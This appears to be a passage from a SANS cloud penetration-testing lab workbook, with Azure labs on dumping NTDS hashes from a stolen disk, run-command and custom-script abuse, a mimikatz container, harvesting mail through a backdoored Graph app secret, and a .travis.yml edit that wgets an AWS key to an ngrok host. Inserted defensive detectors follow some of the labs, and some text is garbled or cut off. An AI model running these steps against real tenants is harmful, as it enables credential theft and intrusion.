Once we have a valid login to our VM, let's perform the following tasks:

$ dmesg | grep sd

What this prints out is all of the SD (SCSI) drives that are available; by default there are two that ship with this VM: sda and sdb . These are already mounted. Are there any others? The first available disk may be sdc
At this point, we can as root create a mount directory and mount the SECOND sdc partition. Why the second? In modern Windows, for EFI purposes, the second partition is more than likely the C:\ drive.

To verify the contents of any disk in the future, perform an fdisk -l /dev/sdX , substituting X for the letter of the disk.

The errors about the machine not being able to mount the disk because the disks were not cleanly unmounted can be safely ignored.
$ ls /mnt/disk1/

Impacket requires the pip binary to be present on our system, which ships with the python-pip package.

$ sudo apt-get update -y && sudo apt install python-pip -y
This clones the impacket repository that contains secretsdump.py . We can now use pip to install impacket as a library so that we can use the secretsdump.py script.

$ cd impacket

The pip install takes a few minutes to build. Once done you will then be able to drop into the examples directory:

~/impacket$ cd examples
~/impacket/example$
Extracting the Hashes

Here is the command that we can use to dump secrets:

~/impacket/example$ python secretsdump.py -system /mnt/disk1/Windows/System32/config/SYSTEM -ntds /mnt/disk1/Windows/NTDS/ntds.dit -outputfile /tmp/hashes -hashes LMHASH:NTHASH LOCAL

What do these switches do?

-system
The location of the SYSTEM HIVE

-ntds

-outputfile /tmp/hashes
We at least now have the Administrator hashes to the VM, which may be used in other places or to get us further into the environment.

Once you have hashes, you may wish to crack them with a password cracking tool. The password cracking tool used is john .

Copy the contents of /tmp/hashes.ntds to your local system. Even a clipboard copy is sufficient. The example below has you copying it to a file called /tmp/hashes on YOUR local system.

When complete run the following commands:

/opt/johntheripper/john --format=NT --wordlist=/home/sec588/files/wordlists/rockyou.txt /tmp/hashes

You should now have a list of passwords used in these password dumps.
Conclusion

This lab provided you a way to look at how Storage and Backup operations can be abused to gain unauthorized access to a system. We performed an attack to show how to obtain the hashes themselves. Using the hashes to move around a network is a discussion for the SEC560 class environment. For now, this is a good

This lab is important as quite often systems administrators build a backup/restore capability somewhere in the system without thinking through the implications of such permissions. Does this account have the capability to snapshot a disk? Possibly. Does the account have the ability to verify and test the authenticity of the disk? Maybe. To expedite our labs, we did everything from within the cloud, but this does not mean that backing up a VHD and downloading it wouldn't also be possible. Keep this in mind when working on Azure Environments.

Additional Resources
Brief Intro

While Microsoft Azure does provide 'Serverless' Functions, the type of functions that they support is starkly different from Amazon Lambda Functions. While Amazon Lambda functions are container-restricted functions that do not easily see other functions, the Microsoft Serverless functions are very different. The system uses an open source framework known as Project Kudu. The project is found at [https://github.com/projectkudu/kudu]. We are going to explore how Azure Functions work with each other and the differences in the system.

Requirements for This Lab
Try It Yourself

Find the Azure Functions Area, and find the resource group called: shared-resource-group . The function name is shared-resource-function-app

You will notice that Functions is now using the new style of Functions, but we can switch this back to "classic experience"

2. Which directory within D:\home is used to store secrets, if any are listed?
3. Which function in the Manage Area contains Secrets from the Vault?
BONUS: There is a vulnerability in several of the functions; what are the vulnerabilities?
Challenge Area Walkthrough
Let's take a look at the dev site: open up Firefox and navigate to [http://portal.azure.com].

We will log in with the jerry@sec588.com account, whose password is HumanMusic2019 .

From here you will click on the shared-resource-function-app. This application has several 'Functions'. Click on the HttpTrigger3 Function.

This particular Function is part of a larger 'application'. In the Lambda world this particular Application would have isolated trigger functions. Let's explore how this is vastly different in Azure.

Let's explore what would happen if someone had command execution in this Application.

set

Notice that there are many environment variables on here. Let's see what other directories we can find.

D:\home\site\wwwroot\HttpTrigger3

Type cd ..

If you type dir you will see all of the files in the repository.

Your job is to answer the following questions ONLY using the console in the GUI to simulate an attacker with

1. Which one of these functions has a Username and Password in the PlainText files?
2. Which directory within D:\home is used to store secrets, if any are listed?
3. Which function in the Manage Area contains Secrets from the Vault? This one can be done in the GUI.
BONUS: There is a vulnerability in several of the functions; what are the vulnerabilities?

Answers

1. If you type the following file: D:\home\site\wwwroot\HttpTrigger1\index.js you will see a username and password at the top of the file.
4. There are 2 vulnerabilities:

SQL Injection in HttpTrigger1, specifically in this field:

var query = "select amount,date from purchases p " + "inner join cards c " + "on p.card_id = c.card_id " + "where c.cardNumber = '" + cardNum + "'";

In the NodeJS HttpTrigger3 there is an eval() statement on the body that will cause Server Side JavaScript Injection (SSJI).
Conclusion

This lab illustrates that once a serverless function in a singular application is compromised, the entire application will act like a monolithic application in terms of security. There is barely any access and authorization control between functions on the disk, and this is very different from other serverless functions that exist. This means

Additional Resources
Brief Intro

While running through an engagement or penetration test, you may find yourself wishing to run commands on a remote system. This course doesn't focus on the commands to run themselves, like a SEC560 or SEC660 course would. While some courses may have you execute lateral movement between systems on the same WAN or LAN environment, this course focuses on alternative methods to run commands on remotely available cloud systems.

The techniques that we will focus on that are specific to Microsoft Azure are:

There are also methods to do this with almost any cloud provider, as this is base functionality.

Internet access and access to our Azure Portal are required for this lab. The Virtual Machine from Lab 3.3 needs to still be available.

On Demand students should ensure they have this virtual machine available; if not, they should recreate it.

Try It Yourself
$ az account show
Let's validate that we can run the Azure commands to list out virtual machines:

$ az vm list -o table

1. The DC
2. An IIS Server
3. A Dockerhost
4. One or more Student VMs

Let us explore the run-command option that is presented to us.

If we execute the command below, we will see options that can be arguments to the command. Some of these are far more attractive to us than other arguments.

$ az vm run-command

How does run-command work? The az vm run-command has a list of commands that can be run; there is a limited set of options.
RunPowerShellScript : Runs a PowerShell script

Given that we have the right to make specific changes, we have the potential to apply the extension labeled RunPowerShellScripts , which would provide us a mechanism to execute PowerShell remotely. There is a bevy of scripts that we can run.

One option? How about if we run powercat.ps1 ? Maybe we can use PowerShell Empire? Some of these options may trip host-based EDR. If you are interested in either tool navigate to:

What's another option? How about if we run some simple commands to prove the power of the system.
1. List the current directory
2. Add a StudentX user

Let's see the syntax of the command:

az vm run-command invoke --command-id RunPowerShellScript --name dc1 -g <class-subdomain>-resources --script '$scriptDir = Get-Location; Write-Host "Current Dir is $scriptDir"'

This command does the following:

--name dc1 : Run it on dc1
-g <class-subdomain>-resources : Our Class Resource group
Executing this command takes a few minutes; the output is returned in JSON:

C:\\Packages\\Plugins\\Microsoft.CPlat.Core.RunCommandWindows\\1.1.3\\Downloads

Are we running these commands in an elevated way? Remember you want to change your studentX account to your student number.
Using the Azure Portal to use the Custom Script Extensions

Custom script extensions can be run from the command prompt, but the experience is very cumbersome. You have to create a specific <xml> file that has a particular format.

Note in the latest Azure portal this has slightly changed, so the Windows CLI is a bit simpler.

Let's try and use the Jerry account to perform these actions through the Azure portal.
Once you get to the Virtual Machine area, look at the different machines. Let's explore dc1 by clicking on it. In the settings area choose Extensions .

There is an existing script extension called create-active-directory-forest . This particular script will set up Active Directory; it uses the PowerShell custom module. You can click on it and see the results, but you cannot actually add another PowerShell extension. Only one module can be attached to a machine. You could uninstall the module, but we may break our lab, so let's not do this.
Navigate back to the computers list. From here, choose your computer, the one you called studentX-Hack . This computer was created in Lab 3.3. Once you have this computer selected, choose Extensions.
The next thing is to click Add . But what will we add? Since this is a Linux computer instance, we cannot run PowerShell, but we can run bash. If the run-command runs as an elevated user in Windows, does this script run as root?
Let's choose Custom Script for Linux . Let's click Create . The new Azure Portal has a new mechanism to create a Linux script or any custom script. This system uses the Azure File Storage Blob. Click Browse .
We navigate to our Storage Container for this lab. The storage account name is: sec588sharedstorageacct

Inside it contains a folder called scripts. Click into that folder.
(Image: Student-X, pics/lab3.5/lab3-5-vm-extensions-storage-directory.png)

Make sure you click the checkbox and click the word select .

cat /etc/shadow

Once done, clicking the CustomScript button should show you the output of the command.
/opt/StorageExplorer/StorageExplorer

Once it is loaded, you can navigate to the folder with these scripts:

sec588sharedstorageacct
Conclusion
>
om
In this lab we have shown you how to execute several commands in Azure, the commands we executed did not
_c
seem to be very special. Over the next few days we will go through which methods of execution prove most
ok
bene cial. However at the momment the critical pieces where, in what context can we execute commands. Will
23169600 tlo
those commands execute as an elevated user, which potentially could be a backdoor in the future?
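From the defender's side, that execution context is exactly what to hunt for. The following is an added example, not code from the SEC588 workbook: a small audit over the JSON that `az vm extension list --resource-group <rg> --vm-name <vm> -o json` returns, flagging the CustomScript extensions, which run as root on Linux and as SYSTEM on Windows. The records are constructed, and the field names `typePropertiesType`, `settings.fileUris` and `settings.commandToExecute` are assumed from the extension's ARM schema.

```python
"""Added example, not code from the SEC588 workbook: audit a VM's extension
list for the CustomScript extensions, which execute operator-supplied
scripts as root (Linux) or SYSTEM (Windows).

Input shape follows `az vm extension list -o json`; the field names
`typePropertiesType`, `settings.fileUris` and `settings.commandToExecute`
are an assumption taken from the extension's ARM schema, and the sample
records are constructed.
"""
import json

# (publisher, type) pairs, lower-cased, whose purpose is to run a script.
SCRIPT_RUNNERS = {
    ("microsoft.azure.extensions", "customscript"),   # Linux, runs as root
    ("microsoft.compute", "customscriptextension"),   # Windows, runs as SYSTEM
}


def extension_findings(extensions):
    """Return one finding dict per script-execution extension in the list."""
    findings = []
    for ext in extensions:
        publisher = str(ext.get("publisher", "")).lower()
        ext_type = str(ext.get("typePropertiesType", ext.get("type", ""))).lower()
        if (publisher, ext_type) not in SCRIPT_RUNNERS:
            continue
        settings = ext.get("settings") or {}
        findings.append({
            "name": ext.get("name"),
            "type": ext_type,
            "state": ext.get("provisioningState"),
            # Where the script came from and what was run: the reviewer needs
            # both to decide whether this was image build automation or not.
            "fileUris": list(settings.get("fileUris") or []),
            "command": settings.get("commandToExecute"),
        })
    return findings


def summarize(findings):
    """One line per finding, suitable for an alert body."""
    lines = []
    for f in findings:
        src = ", ".join(f["fileUris"]) or "(no fileUris; settings may be protected)"
        lines.append(f"{f['name']} [{f['type']}] state={f['state']} "
                     f"script={src} command={f['command']!r}")
    return lines


# Constructed sample: one monitoring agent and one CustomScript run that
# pulled a script from a storage account (placeholder account name).
SAMPLE_EXTENSIONS = json.loads("""
[
  {"name": "OmsAgentForLinux", "publisher": "Microsoft.EnterpriseCloud.Monitoring",
   "typePropertiesType": "OmsAgentForLinux", "provisioningState": "Succeeded",
   "settings": {"workspaceId": "00000000-0000-0000-0000-000000000000"}},
  {"name": "CustomScript", "publisher": "Microsoft.Azure.Extensions",
   "typePropertiesType": "CustomScript", "provisioningState": "Succeeded",
   "settings": {"fileUris": ["https://examplestorageacct.blob.core.windows.net/scripts/shadow.sh"],
                "commandToExecute": "sh shadow.sh"}}
]
""")

if __name__ == "__main__":
    for line in summarize(extension_findings(SAMPLE_EXTENSIONS)):
        print(line)
```

Note that `az vm extension list` never returns `protectedSettings`, so a script passed only through the protected channel shows up with no `commandToExecute`; an extension of this type with empty settings is still a finding to review, not a clean result.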
Why this lab is important

We may find that we have existing running resources in Azure that we cannot access or turn off. The Azure VM is running, and rebooting it or snapshotting it may not yield us options. How can we execute commands? We have shown you two ways to execute backdoors on a live running system. These backdoors could be a download-and-execute of a backdoor through PowerShell or something else. We will provide you additional examples in upcoming sections.

Additional Resources

SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec560)
Brief Intro

One of the newest technologies that you will encounter in the cloud is containers. Windows containers are very different from Linux containers. While some of the container technology was purpose-built for hosting, the Windows kernel is still being expanded to support containers better. The typical thought process for securing a container is not to run antivirus on the container host or within the container, but to scan it while it is stored in a container registry or before it gets pushed to a host. This means that if we can get a machine to execute one of our containers, we may find that the container can reach any number of items in your environment that may be unexpected.

Requirements for This Lab

Try It Yourself

1. List out container registry items.
use .log?
C:\\var

Walkthrough

Let's open the MATE terminal so that we can launch the Azure CLI.

Now there are a couple of caveats that Microsoft has outlined in this:

Restrictions

Azure Container Instances currently supports launching a single process with az container exec, and you cannot pass command arguments. For example, you cannot chain commands like in sh -c "echo FOO && echo BAR", or

This means that we can run powershell.exe or cmd.exe but we cannot run: "cmd.exe /c dir".

Let's open the MATE terminal so that we can launch az:

$ az account show

If we want to use a private Azure Container Registry we can; first we need the name of the container registry:

You can use the username jerry@sec588.com; by now you should have the password.

To list the containers in the registry:

We are not going to use the internal container registry, but why? The internal container registry will require a large number of items to have been checked off:

Azure KeyVault, Azure SAS Tokens, and other authentication information to get the Container Infrastructure to

Our image isn't all that special, so let's do something else: let's pull the same container from the official public Docker Hub registry:

This command may take more than 5 minutes to run, because Windows containers are massive!

What is in microburst_dev? Let's discuss what we have done in this container. This container was built using a

RUN mkdir C:\tools
RUN net user jerry redacted /add
COPY mimikatz C:/tools/
COPY microburst C:/tools/
RUN powershell -noP -sta "Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec -Wait -ArgumentList '/I AzureCLI.msi /quiet'"
# Install-PackageProvider bootstraps the NuGet provider so that Install-Module can run
RUN powershell.exe -noP -sta "Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force"
RUN powershell.exe -noP -sta "Install-Module -Name AzureRM -Scope CurrentUser -Confirm"
RUN powershell -Command Add-WindowsFeature Web-Server; Invoke-WebRequest -UseBasicParsing -Uri "https://dotnetbinaries.blob.core.windows.net/servicemonitor/2.0.1.6/ServiceMonitor.exe" -OutFile "C:\ServiceMonitor.exe"
EXPOSE 80
ENTRYPOINT ["C:\\ServiceMonitor.exe", "w3svc"]
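The Brief Intro above says the place to catch an image like this is the registry, or the push into it. The following is an added example, not the workbook's or the image's own code: a line-based Dockerfile policy check that flags the instructions seen above (a local account created at build time, a credential-dumping tool copied in, a download that is executed straight away). The rules and the sample Dockerfile are constructed for illustration, and the base image line is a placeholder.

```python
"""Added example, not the workbook's code: a registry-side policy check over a
Dockerfile of the kind run before an image is pushed to a host.
Rules and the sample Dockerfile are constructed; they are not a complete policy.
"""
import re

# Each rule: (identifier, regex over one logical instruction, severity)
RULES = [
    ("local-account-created", re.compile(r"\bnet\s+user\b.*\s/add\b", re.I), "high"),
    ("credential-dumping-tool", re.compile(r"\bmimikatz\b", re.I), "high"),
    ("download-and-execute",
     re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget)\b.*\b(Start-Process|msiexec|\.exe|\.msi)\b", re.I),
     "medium"),
]


def logical_instructions(dockerfile_text):
    """Join backslash-continued lines so each Dockerfile instruction is one string."""
    instructions, buf = [], ""
    for raw in dockerfile_text.splitlines():
        line = raw.rstrip()
        if not line or line.lstrip().startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        instructions.append((buf + line).strip())
        buf = ""
    if buf:
        instructions.append(buf.strip())
    return instructions


def scan_dockerfile(dockerfile_text):
    """Return [(rule_id, severity, instruction)] for every rule that matches."""
    hits = []
    for ins in logical_instructions(dockerfile_text):
        verb = ins.split(None, 1)[0].upper()
        # Only RUN and COPY/ADD carry content we care about; FROM/EXPOSE do not.
        if verb not in {"RUN", "COPY", "ADD"}:
            continue
        for rule_id, pattern, severity in RULES:
            if pattern.search(ins):
                hits.append((rule_id, severity, ins))
    return hits


def should_block(hits):
    """Policy decision: any high-severity hit blocks the push."""
    return any(sev == "high" for _, sev, _ in hits)


# Constructed sample, modelled on the image described above; FROM is a placeholder.
SAMPLE_DOCKERFILE = r"""
# constructed placeholder base image
FROM example.invalid/windows-base:latest
RUN mkdir C:\tools
RUN net user jerry redacted /add
COPY mimikatz C:/tools/
RUN powershell -noP -sta "Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows \
    -OutFile .\AzureCLI.msi; Start-Process msiexec -Wait -ArgumentList '/I AzureCLI.msi /quiet'"
EXPOSE 80
ENTRYPOINT ["C:\\ServiceMonitor.exe", "w3svc"]
"""

if __name__ == "__main__":
    for rule_id, severity, ins in scan_dockerfile(SAMPLE_DOCKERFILE):
        print(f"[{severity}] {rule_id}: {ins}")
    print("block push:", should_block(scan_dockerfile(SAMPLE_DOCKERFILE)))
```

A check like this only sees what the Dockerfile declares; binaries copied in with COPY still need the image layers themselves scanned, which is why the text above places the scan at the registry rather than at the host.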
What does this container do? This container was an experiment by the author: could you push obviously malicious payloads into a live container environment? The answer is yes, but there are many caveats:

1. The command execution environment wraps in a very strange way, which will not yield a perfectly running shell.
2. There are issues executing certain commands from outside of items like PowerShell.

What the author recommends is to copy a backdoor binary like a Metasploit payload to connect back to you. Once the container is in place, let's execute a few jobs:

shared-resource-group

This container will now execute and attach a shell to you, a PowerShell runtime binary.

You can look around the system that is running Kubernetes; for example, you can:

Some of the oddities of this shell? Meterpreter is caught when run as an .exe, but not caught when run in a different language like PowerShell. Mimikatz is also not prevented, oddly enough.

If you have extra time

You can attempt to run mimikatz to dump out the contents of the shell like so:

C:\ PS> cd tools\

This will BREAK your shell; you will not see more than 2 or 3 lines.

C:\ PS> .\mimikatz.exe
mimikatz # log
mimikatz # privilege::debug
mimikatz # lsadump::sam
mimikatz # exit

Please note you will now get the following error: ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO

errors are new to the Azure Container environment and could indicate further hardening from Microsoft to prevent

This lab is the beginning of a cursory tour of the az tool. The tool itself can be wielded both for positive system administration and for our own use in a penetration test, if we understand how to navigate the system. Just like with the aws tool, the az tool works at the control plane layer and could circumvent some of the traditional controls we may have put into a system.

Why this lab is important

Over the next few labs, we will be using this tool to implement our actions; getting familiar with how to use the tool for reconnaissance gathering, listing of permissions and more will be critical.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Brief Intro

Microsoft Graph is a new SDK and API that allows for a programmable way to access Microsoft-specific services. While Microsoft Graph has been around in some form for a while, it was never more important or relevant than when the CEO of Microsoft "deprioritized" Windows for Microsoft Graph (http://bit.ly/2SDgAqO).

Microsoft Graph, while powerful, is not as simple as it may seem. Permissions for Microsoft Graph are critical, and for full-on Applications. We will be playing around with understanding how these API keys can be built and what can be done with them.

What is more alarming is the amount of confidential, private, sensitive or otherwise information that is still being emailed as part of the operational processes of an organization. What we are going to do in this lab is Data

A web browser

Try It Yourself

2. Find the Postman App Registration in Azure Active Directory.
3. Using the Postman App, create a Client Secret using StudentX-Postman.
4. Configure Postman to connect to Microsoft Graph and query Summer's email.
5. Once you have Summer's email, try and download the file in a sensitive email.

Navigate to https://portal.azure.com and login as jerry@sec588.com with his account. Once you

We have pre-built a Postman Application for you; consider that this could be an internal application, it could be called anything. It could even be a Microsoft PowerBI or a Microsoft Graph application in house. Either way you

First let's note a few items on the main page; record the following:

Application (client) Id
Directory (tenant) Id

Now let's click on API Permissions. Here we can see that this App has a few elevated permissions:

Files.Read : This is a user-based permission; it applies to whoever owns this application and will read the files for the user in OneDrive.
User.Read : This is a user-based permission; it applies to whoever owns this application and will read the user information.

There are other permissions:

Mail.Read.All : This is an application-based permission; it applies globally and will read ALL users' mail.
Files.Read.All : This is an application-based permission; it applies globally and will read ALL users' files in OneDrive.
Users.Read.All : This is an application-based permission; it applies globally and will read ALL the users in the

How can we backdoor this access and get access to the API? Let's add our own Client Secret to start. Navigate to the Certificates & Secrets menu. From within this menu add a new Client Secret, for one year, and name it

Armed with these values we can now configure Postman.

Let's open the MATE terminal so that we can launch Postman:

$ cd /opt/postman
$ ./Postman

We will need to download and install the collection and the environment. To do so visit these links:

https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-collections/master/Microsoft%20Graph.postman_collection.json
https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-collections/master/Microsoft%20Graph.postman_environment.json

To import them use the Import function of Postman. From here click 'Import' and enter the URL.

ClientSecret
TenantId

And there are two that you do not have: the first one is AppAccessToken and the second is UserAccessToken.

Let's fill these in as the CURRENT VALUE and make sure to hit ENTER after each value is put in.

ClientId will be the value: Application (client) Id
TenantId will be the value: Directory (tenant) Id
The ClientSecret will be the one-time token that you created as the Student1-Postman secret. Put in these values.

Let's create a new request: click the + to open a new tab and make a POST request to:

https://login.microsoftonline.com/{{TenantID}}/oauth2/v2.0/token

Set the body type to x-www-form-urlencoded. The URL-encoded area will need a few rows to be added. These are case sEnSiTiVe:

Key: grant_type      Value: client_credentials
Key: client_id       Value: {{ClientID}}
Key: client_secret   Value: {{ClientSecret}}
Key: scope           Value: https://graph.microsoft.com/.default

At the bottom of the response you should see a JSON object with the key "access_token" and its value in quotes; copy the value without the quotes. This is your AppAccessToken.
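As an added example (not part of the workbook), here is the same client_credentials request built in Python, followed by the two checks a defender would run against what this lab produces: decoding the returned access token to list its `roles` (the application permissions from the API Permissions page; delegated permissions such as Files.Read appear under `scp` instead) and reviewing the app registration's `passwordCredentials` for the one-year secret added under Certificates & Secrets. The token and the credential list are constructed, the JWT is unsigned and only inspected, never verified, and the helper names are assumptions.

```python
"""Added example, not the workbook's code: build the client_credentials
request described above, then inspect the access token and the app
registration's credential list the way a defender would.

The token is constructed (dummy signature); its claim names follow what
Azure AD issues (`appid`, `roles`, `scp`, `exp`, `tid`). The credential
list is constructed too, in the shape of an app manifest's passwordCredentials.
"""
import base64
import json
from datetime import datetime, timedelta, timezone
from urllib.parse import urlencode

TOKEN_URL = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"


def build_token_request(tenant_id, client_id, client_secret):
    """URL and x-www-form-urlencoded body for the client_credentials grant."""
    body = urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": "https://graph.microsoft.com/.default",
    })
    return TOKEN_URL.format(tenant=tenant_id), body


def _b64url_decode(segment):
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_claims(jwt):
    """Return the payload claims WITHOUT verifying the signature.
    Inspection only: never use these claims for an authorization decision."""
    _header, payload, _signature = jwt.split(".")
    return json.loads(_b64url_decode(payload))


def tenant_wide_roles(claims):
    """Application permissions (`roles`) that reach every user's data."""
    return sorted(r for r in claims.get("roles", []) if r.endswith(".All"))


def risky_secrets(password_credentials, now, max_lifetime_days=365, recent_days=7):
    """Flag client secrets that were added recently or are unusually long-lived."""
    flagged = []
    for cred in password_credentials:
        start = datetime.fromisoformat(cred["startDateTime"].replace("Z", "+00:00"))
        end = datetime.fromisoformat(cred["endDateTime"].replace("Z", "+00:00"))
        reasons = []
        if now - start < timedelta(days=recent_days):
            reasons.append("added-recently")
        if end - start > timedelta(days=max_lifetime_days):
            reasons.append("long-lived")
        if reasons:
            flagged.append((cred.get("displayName"), reasons))
    return flagged


def make_unsigned_jwt(claims):
    """Constructed token for the demonstration only; Azure AD tokens are RS256-signed."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return ".".join([enc({"alg": "none", "typ": "JWT"}), enc(claims), "sig"])


NOW = datetime(2020, 7, 28, tzinfo=timezone.utc)
SAMPLE_TOKEN = make_unsigned_jwt({
    "aud": "https://graph.microsoft.com",
    "tid": "00000000-0000-0000-0000-000000000000",
    "appid": "11111111-1111-1111-1111-111111111111",   # `azp` in v2-format tokens
    "roles": ["Mail.Read.All", "Files.Read.All", "User.Read.All"],
    "exp": int((NOW + timedelta(hours=1)).timestamp()),
})
SAMPLE_CREDENTIALS = [
    {"displayName": "original", "startDateTime": "2019-01-01T00:00:00Z", "endDateTime": "2020-12-31T00:00:00Z"},
    {"displayName": "StudentX-Postman", "startDateTime": "2020-07-27T12:00:00Z", "endDateTime": "2021-07-27T12:00:00Z"},
]

if __name__ == "__main__":
    url, body = build_token_request("TENANT", "CLIENT", "SECRET")
    print(url, body)
    print(tenant_wide_roles(decode_claims(SAMPLE_TOKEN)))
    print(risky_secrets(SAMPLE_CREDENTIALS, NOW))
```

The second check is the one that catches this lab's backdoor: a secret that appeared on an application holding Mail.Read.All is worth a question even when the application itself is legitimate.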
Using Graph to find Emails

You can play with any of the queries you want. The way you will run a query is to use one of the ones you have permission to, that is, either "Mail" or "Users".

For Mail, let's click Get a Users Messages. This will get all the messages of a specific user.

If you look at the URL it shows {{UserId}}. Clicking send now will give you an error because the {{UserId}} is blank. If we wish to use this, click the Eyeball once again, and under Current Value let's put in summer@sec588.com.

If you look at the JSON carefully, let's take a look at some areas:

bodyPreview : Summer this is sensitive
sender : George Georgeson, a Global Admin.

Summer received some type of special file, and I would assume that this is potentially useful for us to have. Since we have Summer's username and password we can login and retrieve this file. If not, we would need to find a different way.

jerry
users or login as summer .

You can locate the email message now and even download the file, which is an SSH key. Keep this key for a future lab.

Conclusion

There are tools today like MailSniper that are designed to use the Office 365 APIs to try and extract emails from the system. As the Microsoft Graph API and other similar APIs are universally built at Microsoft, we will need to keep an eye on the APIs. There may not be a tool designed to harvest this information on day one, but understanding how the tool will work by using developer-focused tools like Postman could help us expedite the ability to abuse these sources of information.

Microsoft Graph is a treasure trove of information. While you may not have direct access to all of the sources of data directly, you could attempt to indirectly access the system by leveraging the Microsoft Graph API in a pseudo out-of-band way. It would be ideal if administrators always looked at where they have deployed keys and rotated them often.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
Brief Intro

The CI/CD pipeline is a critical part of the software supply chain. CI stands for Continuous Integration and CD for Continuous Delivery. The word Continuous is only possible through automation. If you can poison or find your way into a CI/CD pipeline, you can start to very much harm a system and introduce many attack vectors. This lab does not demonstrate a full payload attack because the terms of service of the CI pipeline may be violated; however, we will demonstrate extraction of sensitive data supplied by the author.

Requirements for This Lab

This lab will require you to have completed the Microsoft Graph Lab; you will also need the following items:

ssh
ngrok
A working python environment
git
An Internet connection

Try It Yourself

To attempt this lab yourself you must do the following items:

Walkthrough

To get started we will begin by using the SSH key that we found in our email in Section 3.7. If you recall, you downloaded it as:

day4

When we do this step our wiki-updater.sh will break; you need to restore this script for it to continue to work.

This file should be located in /home/sec588/Downloads.

Let's open the MATE terminal so that we can modify some settings.

Once the terminal is open, type the following commands:

$ cp /home/sec588/Downloads/day4 /home/sec588/.ssh/day4
$ cd /home/sec588/.ssh/

We also need to modify the config file.

$ nano config

The file will ship like this:

host github.com
Hostname github.com
IdentityFile ~/.ssh/sec588-wiki-vm-keys
User git

Given that international keyboards do not necessarily support ~, let's do two things: remove the IdentityFile

host github.com
Hostname github.com
#IdentityFile ~/.ssh/sec588-wiki-vm-keys
IdentityFile /home/sec588/.ssh/day4
User git

We can now use the SSH configuration to push and pull items. While we could spend days or weeks figuring out what this file does, we are going to shortcut this process by telling you that this key will allow you to deploy into a specific repository, so let's play with this. The first thing we will do is pull the repository down:

$ cd /home/sec588/files/workdir

This will allow you to clone down the repo for this lab. The next thing you will need to do is modify the git repository so that you can push changes:

$ git remote -v

This will allow you to check out the current setting. Let's change it to SSH:

$ git remote set-url origin git@github.com:mosesrenegade/sec588-day4
$ git remote -v

At this point we are ready to look at our files. Switch directory into sec588-day4:

$ cd sec588-day4

We have two files that could be useful. The first one is the Dockerfile; we could poison this file with a backdoor. Instead, what we will concentrate on is extracting information from the .travis.yml.

connect to a private repository or maybe more. Let's show you how to obtain it.

ngrok window
simplehttpserver window
day4 window

These are the three windows that we will have; they are shown below.

In the ngrok window you will see the following line:

Forwarding http://<randomurl> -> http://localhost:8888

Record the random URL; this is your internet address that will forward all traffic to your local computer.

After we have a new branch, the next thing we will do is open the .travis.yml file; you can use nano or whatever

$ nano .travis.yml

Look at the travis file, specifically right after the section that reads:

after_success:
  - docker --version

What we will do is modify it to read the following:

after_success:
  - echo $AWS_ACCESS_KEY_ID
  - wget http://ngrok-randomurl/`echo $AWS_ACCESS_KEY_ID`

We can now commit our branch to the GitHub repository, which should start a build:

$ git add .

You can put anything you want in the comment:

$ git commit -m 'Our Fun Commit'
$ git push origin studentX

This will push our repository into GitHub. It may take up to 5 minutes to create the build, but what should occur is a request to the URL that reads out an environment variable, in our case AWS_ACCESS_KEY_ID.
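What would have caught the change above is a review of the pipeline file itself, not the build log. The following is an added example, not code from the workbook or the sec588-day4 repository: a pre-merge check that walks the lifecycle phases of a .travis.yml and flags any step that reads a secret-looking environment variable and either echoes it or hands it to a network client. Both sample files are constructed; the `language` and `script` lines are placeholders.

```python
"""Added example, not the workbook's code: a pre-merge check over a
.travis.yml that flags build steps which read secret-looking environment
variables and echo them or pass them to a network client.

Line-based on purpose (no YAML library): only the lifecycle phases and their
shell steps matter here. Both sample files are constructed.
"""
import re

PHASES = {"before_install", "install", "before_script", "script", "after_success",
          "after_failure", "before_deploy", "deploy", "after_script"}
SECRET_VAR = re.compile(r"\$\{?([A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|KEY|CREDENTIAL)[A-Z0-9_]*)\}?")
NETWORK_TOOL = re.compile(r"\b(wget|curl|nc|ncat|python\s+-m\s+http\.client|Invoke-WebRequest)\b")
LEAK_TO_LOG = re.compile(r"\becho\b|\bprintenv\b|\benv\b")


def steps_by_phase(travis_text):
    """Yield (phase, command) for every '- cmd' item under a lifecycle key."""
    phase = None
    for raw in travis_text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        key = re.match(r"^([A-Za-z_]+):\s*(.*)$", raw)
        if key and not raw.startswith((" ", "\t", "-")):
            phase = key.group(1) if key.group(1) in PHASES else None
            if phase and key.group(2):            # inline form: `script: cmd`
                yield phase, key.group(2)
            continue
        item = re.match(r"^\s*-\s+(.*)$", raw)
        if phase and item:
            yield phase, item.group(1)


def audit_travis(travis_text):
    """Return (phase, kind, secret_names, command) for each suspicious step."""
    findings = []
    for phase, cmd in steps_by_phase(travis_text):
        secrets = sorted(set(SECRET_VAR.findall(cmd)))
        if not secrets:
            continue
        if NETWORK_TOOL.search(cmd):
            findings.append((phase, "secret-to-network", secrets, cmd))
        elif LEAK_TO_LOG.search(cmd):
            findings.append((phase, "secret-echoed", secrets, cmd))
    return findings


# Constructed samples: the file before and after the edit described above.
ORIGINAL = """\
language: python
script:
  - docker build -t example/app .
after_success:
  - docker --version
"""

MODIFIED = """\
language: python
script:
  - docker build -t example/app .
after_success:
  - echo $AWS_ACCESS_KEY_ID
  - wget http://ngrok-randomurl/`echo $AWS_ACCESS_KEY_ID`
"""

if __name__ == "__main__":
    for phase, kind, names, cmd in audit_travis(MODIFIED):
        print(f"{phase}: {kind} {names}: {cmd}")
```

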